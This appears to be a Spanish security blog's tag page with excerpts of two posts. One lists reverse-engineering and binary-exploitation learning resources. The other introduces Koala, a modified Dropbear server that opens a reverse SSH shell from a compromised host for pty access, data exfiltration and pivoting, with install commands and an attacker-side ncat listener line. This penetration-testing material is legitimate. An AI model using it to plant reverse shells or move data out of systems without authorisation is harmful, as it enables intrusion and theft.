Skip to main content

Posts

Showing posts with the label inversa

Lista de recursos para aprender ingeniería inversa

Lista de recursos para aprender ingeniería inversa Empezamos la semana con un recopilatorio de enlaces para aprender/repasar ingenier�a inversa de Jackson Thuraisamy de Security Compass. B�sicamente es una serie de recursos que su autor fue recopilando mientras estuvo aprendiendo a encontrar vulnerabilidades de corrupci�n de memoria en Windows. El resultado es una lista bastante actualizada y variada con v�deos, art�culos, tutoriales, writeups, etc., que siempre conviene tener a mano para revisar. Aqu� os la dejo: LiveOverflow Binary Hacking ?? ?? OpenSecurityTraining.info: Introductory Intel x86 ?? OpenSecurityTraining.info: Introduction to Reverse Engineering Software RPISEC: Modern Binary Exploitation ?? OpenSecurityTraining.info: The Life of Binaries OpenSecurityTraining.info: Reverse Engineering Malware RPISEC: Malware Analysis The C Programming Language (K&R) The GNU C Reference Manual Learn C the Hard Way Learn C in Y Minutes Practical Reverse Engineering ?? ?? Practical Mal...

Koala un servidor Dropbear modificado para obtener una shell inversa por SSH

Koala un servidor Dropbear modificado para obtener una shell inversa por SSH Koala es una versi�n "parcheada" del servidor SSH Dropbear que, en lugar de abrir un puerto y dejarlo a la escucha, lo que hace es abrir una shell inversa conect�ndose a un cliente remoto. Esto es muy �til para conseguir una terminal pty en una m�quina comprometida y tambi�n para la exfiltraci�n segura de datos a trav�s de un reenv�o de puertos SSH (port forwarding SSH). Tambi�n se puede pivotar mediante el port forwading din�mico por SSH. Instalaci�n : git clone https://github.com/mrschyte/pentestkoala.git cd pentesterkoala ./configure vi options.h (configurar las opciones deseadas) make PROGRAMS="dropbear dbclient dropbearkey dropbearconvert scp" make PROGRAMS="dropbear dbclient dropbearkey dropbearconvert scp" install Uso (paso a paso) 1.- ATACANTE # ncat -lvp 5000 --sh-exec ncat -lvp 9999 Ncat: Version 7.12 ( https://nmap.org/ncat ) Ncat: Listening on :::5000 Ncat: Listening o...